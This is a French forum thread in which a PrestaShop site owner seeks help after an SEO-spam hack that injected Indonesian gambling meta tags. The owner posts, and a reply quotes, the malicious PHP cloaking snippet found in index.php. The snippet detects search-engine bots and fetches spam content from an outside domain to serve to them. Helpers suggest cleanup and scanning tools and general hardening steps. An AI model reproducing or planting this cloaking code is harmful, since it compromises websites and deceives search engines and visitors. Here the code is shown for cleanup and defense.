IBB Posted July 5, 2024 Share Posted July 5, 2024 Bonsoir à tous, Je gère un site web PrestaShop hébergé chez LWS et récemment, il a été piraté. J'ai découvert des métadonnées indésirables dans l'en-tête de la page d'accueil de mon site. Des mots comme "SAPITOTO" et des phrases en indonésien apparaissent dans les balises meta, ce qui indique que le site a été compromis par des hackers. Voici un extrait du code affecté : <!DOCTYPE html> <html ⚡="" lang="id" amp="" i-amphtml-binding="" i-amphtml-layout="" i-amphtml-no-boilerplate="" transformed="self;v=1" itemscope="itemscope" itemtype="https://schema.org/WebPage" amp-version="2406071948000" class="i-amphtml-singledoc i-amphtml-standalone"><head> <meta name="viewport" content="width=device-width,initial-scale=1"> <title>SAPITOTO 10 Bandar Situs Toto 4d Dan Togel Online Resmi Jaya No 1 Indonesia</title> <meta name="description" content="Temukan pengalaman bermain Toto 4D dan togel online terbaik di SAPITOTO 10 Bandar Situs Toto 4d Dan Togel Online Jaya Resmi No 1 Indonesia." /> <meta name="keywords" content="situs toto, situs toto resmi, situs toto jaya, situs toto 4d, situs toto 4d resmi, togel online, togel online 4d, situs togel, togel online resmi, situs togel jaya, sapitoto" /> <meta name="page google.com" content="https://www.google.com/search?q=sapi+toto"> <meta name="page google.co.id" content="https://www.google.co.id/search?q=sapi+toto"> <meta name="page google.com" content="https://www.google.com/search?q=sapitoto"> <meta name="page google.co.id" content="https://www.google.co.id/search?q=sapitoto"> <link itemprop="mainEntityOfPage" rel="canonical" href="https://urbanart.ma/" /> <link rel="amphtml" href="https://pub-65759e4fd0324f7680a0a3913203d631.r2.dev/urbanart.html" /> urbanart.ma est le nom de domaine. Il me semble que les pirates sont des indonisiens. J'ai essayé de retrouver les traces des pirates dans les fichiers de mon site en effectuant des recherches de mot clé comme "SAPITOTO" mais ça n'a donné aucun résultat. Donc je ne sais plus à quel moment exactement ces scripts sont injectés le code de la page indexée. J'aimerais obtenir des conseils sur la manière de nettoyer complètement ces données indésirables de mon site et de renforcer la sécurité pour éviter de futures intrusions. Merci d'avance pour votre aide! Link to comment Share on other sites More sharing options...
Eolia Posted July 5, 2024 Share Posted July 5, 2024 Utilisez cleaner^^ https://shop.devcustom.net/fr/content/16-nettoyage-hack Link to comment Share on other sites More sharing options...
Mediacom87 Posted July 5, 2024 Share Posted July 5, 2024 Bonjour, on en parle depuis longtemps de ces piratages à répétition sur PrestaShop : https://www.mediacom87.fr/securite-prestashop-proactive-ou-corrective/ Link to comment Share on other sites More sharing options...
Eolia Posted July 5, 2024 Share Posted July 5, 2024 Mouais, alors perso je ne suis pas du tout fan du module PrestaScan Security qui n'est pas transparent du tout, a un accès total à la boutique et à la base de données et envoie les infos chez profileo. 2 Link to comment Share on other sites More sharing options...
IBB Posted July 5, 2024 Author Share Posted July 5, 2024 (edited) 3 hours ago, Eolia said: Utilisez cleaner^^ https://shop.devcustom.net/fr/content/16-nettoyage-hack Salut merci pour votre réponse ! J'ai essayé mais on me demande toujours d'augmenter la taille de la mémoire sur le serveur d'au minimum 512M je ne sais pas pourquoi. Vous avez une idée de comment pourrais-je s'en passer de ça ? Edited July 5, 2024 by IBB (see edit history) Link to comment Share on other sites More sharing options...
IBB Posted July 5, 2024 Author Share Posted July 5, 2024 (edited) 1 hour ago, Mediacom87 said: Bonjour, on en parle depuis longtemps de ces piratages à répétition sur PrestaShop : https://www.mediacom87.fr/securite-prestashop-proactive-ou-corrective/ Abbon!? Donc c'est partout alors 🤔 Leurs virus est très puissant quand même j'avoue. Merci pour lien pour le lien du coup ! Edited July 5, 2024 by IBB (see edit history) Link to comment Share on other sites More sharing options...
Mediacom87 Posted July 6, 2024 Share Posted July 6, 2024 Il y a 16 heures, Eolia a dit : Mouais, alors perso je ne suis pas du tout fan du module PrestaScan Security qui n'est pas transparent du tout, a un accès total à la boutique et à la base de données et envoie les infos chez profileo. Personnellement, je lui préfère https://github.com/prestaalba/fop_publishedvulnerabilityscan Link to comment Share on other sites More sharing options...
Eolia Posted July 6, 2024 Share Posted July 6, 2024 Il y a 15 heures, IBB a dit : Salut merci pour votre réponse ! J'ai essayé mais on me demande toujours d'augmenter la taille de la mémoire sur le serveur d'au minimum 512M je ne sais pas pourquoi. Vous avez une idée de comment pourrais-je s'en passer de ça ? Dans les paramètres de votre hébergement si vous pouvez augmenter la mémoire disponible. Il y a 15 heures, IBB a dit : Abbon!? Donc c'est partout alors 🤔 Leurs virus est très puissant quand même j'avoue. Ce ne sont pas des virus mais des scripts et il n'y en a pas qu'un mais des milliers. Tous les sites web se font attaquer en permanence. Link to comment Share on other sites More sharing options...
Eolia Posted July 6, 2024 Share Posted July 6, 2024 il y a une heure, Mediacom87 a dit : Personnellement, je lui préfère https://github.com/prestaalba/fop_publishedvulnerabilityscan Celui-là est très bien mais ne check que les modules connus pour avoir des failles. Link to comment Share on other sites More sharing options...
IBB Posted July 6, 2024 Author Share Posted July 6, 2024 Quand j'ai lancé le script cleaner.php, il m'a fait savoir que le fichier index.php coeur de mon site contenait un script php qui n'était pas dans la version d'origine. Et effectivement, j'y suis allé jeter un coup d'oeil, je vois un script php qui contenait ce code ci-dessous tout au début du fchier avant même les commentaires prestashop: function is_bot() { $user_agent = $_SERVER['HTTP_USER_AGENT']; $bots = array('Googlebot', 'TelegramBot', 'bingbot', 'Google-Site-Verification', 'Google-InspectionTool'); foreach ($bots as $bot) { if (stripos($user_agent, $bot) !== false) { return true; } } return false; } if (is_bot()) { $message = file_get_contents('https://seoleveling.org/CLOAKING/urbanart.ma.txt');#NAROLINK echo $message; } Avant quand demandais une réindexation et explore la page trouvée, je voyais tas d'informations des pirates et même l'en-tête de la était carrément modifié. Mais maintenant que j'ai mis à jour le fichier index.php et demander à nouveau une réindexation, tous ces blablas n'y sont plus ! Un grand merci à vous tous !!! Link to comment Share on other sites More sharing options...
Mediacom87 Posted July 6, 2024 Share Posted July 6, 2024 il y a une heure, Eolia a dit : Celui-là est très bien mais ne check que les modules connus pour avoir des failles. Tout à fait, il vient en complément de ton script, c'est une évidence. Nettoyer un hack, n'est pas simplement remettre les fichiers d'origine, je suis abasourdie par certains professionnels qui ne font rien de plus. L'accumulation de solution peut aider à optimiser les informations. Link to comment Share on other sites More sharing options...
Eolia Posted July 6, 2024 Share Posted July 6, 2024 il y a 55 minutes, IBB a dit : Quand j'ai lancé le script cleaner.php, il m'a fait savoir que le fichier index.php coeur de mon site contenait un script php qui n'était pas dans la version d'origine. Et effectivement, j'y suis allé jeter un coup d'oeil, je vois un script php qui contenait ce code ci-dessous tout au début du fchier avant même les commentaires prestashop: function is_bot() { $user_agent = $_SERVER['HTTP_USER_AGENT']; $bots = array('Googlebot', 'TelegramBot', 'bingbot', 'Google-Site-Verification', 'Google-InspectionTool'); foreach ($bots as $bot) { if (stripos($user_agent, $bot) !== false) { return true; } } return false; } if (is_bot()) { $message = file_get_contents('https://seoleveling.org/CLOAKING/urbanart.ma.txt');#NAROLINK echo $message; } Avant quand demandais une réindexation et explore la page trouvée, je voyais tas d'informations des pirates et même l'en-tête de la était carrément modifié. Mais maintenant que j'ai mis à jour le fichier index.php et demander à nouveau une réindexation, tous ces blablas n'y sont plus ! Un grand merci à vous tous !!! Ce qu'il faut savoir c'est que ce code n'est pas arrivé tout seul donc bien regarder la liste des modules inscrit comme contenant des fonctions sensibles et les supprimer (si vous ne les utilisez pas) ou les mettre à jour au plus vite. Link to comment Share on other sites More sharing options...
IBB Posted July 6, 2024 Author Share Posted July 6, 2024 1 hour ago, Eolia said: Ce qu'il faut savoir c'est que ce code n'est pas arrivé tout seul donc bien regarder la liste des modules inscrit comme contenant des fonctions sensibles et les supprimer (si vous ne les utilisez pas) ou les mettre à jour au plus vite. Le problème est qu'il y en a tellement que si je décide de tout supprimer j'ai peur que cela n'endommage tout le système. Link to comment Share on other sites More sharing options...
Mediacom87 Posted July 6, 2024 Share Posted July 6, 2024 il y a 16 minutes, IBB a dit : Le problème est qu'il y en a tellement que si je décide de tout supprimer j'ai peur que cela n'endommage tout le système. Il faut analyser le code et savoir s'il y a un risque ou non. Link to comment Share on other sites More sharing options...
Eolia Posted July 6, 2024 Share Posted July 6, 2024 il y a 36 minutes, IBB a dit : Le problème est qu'il y en a tellement que si je décide de tout supprimer j'ai peur que cela n'endommage tout le système. Vous ne supprimez, depuis le BO => pages Modules, UNIQUEMENT les modules que vous n'utilisez pas ou qui sont désactivés ou non-configurés Link to comment Share on other sites More sharing options...
IBB Posted July 7, 2024 Author Share Posted July 7, 2024 23 hours ago, Eolia said: Vous ne supprimez, depuis le BO => pages Modules, UNIQUEMENT les modules que vous n'utilisez pas ou qui sont désactivés ou non-configurés OKay d'accord. Mais jusque là c'est leur logo qui refuse de céder. Pourtant le lien qui inclut le logo pointe vers le mien. Avez-vous une solution pour se débarrasser ? Link to comment Share on other sites More sharing options...
Eolia Posted July 7, 2024 Share Posted July 7, 2024 Il y a 3 heures, IBB a dit : OKay d'accord. Mais jusque là c'est leur logo qui refuse de céder. Pourtant le lien qui inclut le logo pointe vers le mien. Avez-vous une solution pour se débarrasser ? De quoi parlez-vous ? Quel logo, qui refuse de céder quoi ? Link to comment Share on other sites More sharing options...
IBB Posted July 7, 2024 Author Share Posted July 7, 2024 Quand ils ont piratés, ils ont carrément changé le logo de mon site en le remplaçant par le leur. Et même après que j'aie nettoyé leur traces le logo reste toujours. Voici en image de quoi je parle Pourtant le lien vers mon logo est bien defini dans l'en-tête de la page comme vous pouvez le voir en image. Link to comment Share on other sites More sharing options...
Eolia Posted July 7, 2024 Share Posted July 7, 2024 Relancez le sitemap et demandez à Google de ré-indexer Link to comment Share on other sites More sharing options...
IBB Posted July 7, 2024 Author Share Posted July 7, 2024 32 minutes ago, Eolia said: Relancez le sitemap et demandez à Google de ré-indexer Oui j'avais déjà effectué tout ça mais malgré tout ça persiste toujours. Pourtant le changement a été effectué sur mobile. Mais sur PC pas encore Link to comment Share on other sites More sharing options...
Eolia Posted July 8, 2024 Share Posted July 8, 2024 L'index Google est mobile first il a donc indexé les pages en vue mobile en premier, la vue desktop va suivre. Link to comment Share on other sites More sharing options...
IBB Posted July 8, 2024 Author Share Posted July 8, 2024 1 hour ago, Eolia said: L'index Google est mobile first il a donc indexé les pages en vue mobile en premier, la vue desktop va suivre. OKay donc je dois continuer à attendre jusqu'à ce que le moteur Google indexe sur Desktop aussi Link to comment Share on other sites More sharing options...
djelcass Posted February 7 Share Posted February 7 Les attaques de cloaking peuvent être sophistiquées et difficiles à détecter. Voici quelques conseils pour vous protéger et réagir rapidement en cas d'intrusion : 1. Sauvegardez régulièrement votre site : Il est essentiel de toujours disposer d'une copie de sécurité complète de votre site internet. Cela vous permettra de restaurer votre site en l'état en cas de compromission. 2. Changez vos mots de passe régulièrement : Renouvelez les mots de passe de vos comptes administrateurs, FTP, base de données et autres services liés à votre site. Utilisez des mots de passe forts et uniques. 3. Créez un compte Google Search Console : Configurez un compte Google Search Console et vérifiez la propriété de votre domaine en ajoutant un enregistrement TXT DNS. Cela vous permettra de surveiller les performances de votre site et de détecter toute activité suspecte. 4. Identifiez les fichiers modifiés par l'attaquant : Si votre site est compromis, utilisez le script `clean.php` (s'il est disponible) pour identifier les fichiers altérés par l'attaquant. Cela vous aidera à nettoyer votre site efficacement. 5. Générez et soumettez un sitemap : Créez un sitemap pour votre boutique PrestaShop et soumettez-le via Google Search Console. Cela permettra à Google de mieux indexer votre site et de détecter rapidement toute anomalie. En suivant ces recommandations, vous serez en mesure de détecter une attaque en temps réel et de prendre les mesures nécessaires pour y remédier rapidement. --- Ces conseils vous aideront à renforcer la sécurité de votre site et à minimiser les risques d'attaques futures. Link to comment Share on other sites More sharing options...
Eolia Posted February 8 Share Posted February 8 L'intérêt d'un post ChatGPT ici ? 1 Link to comment Share on other sites More sharing options...
djelcass Posted February 10 Share Posted February 10 Les informations que j'ai ajoutées ne proviennent pas de ChatGPT, mais de mon expérience. J'ai travaillé sur plusieurs sites ayant été victimes de cloaking. Link to comment Share on other sites More sharing options...
Recommended Posts
Create an account or sign in to comment
You need to be a member in order to leave a comment
Create an account
Sign up for a new account in our community. It's easy!
Register a new accountSign in
Already have an account? Sign in here.
Sign In Now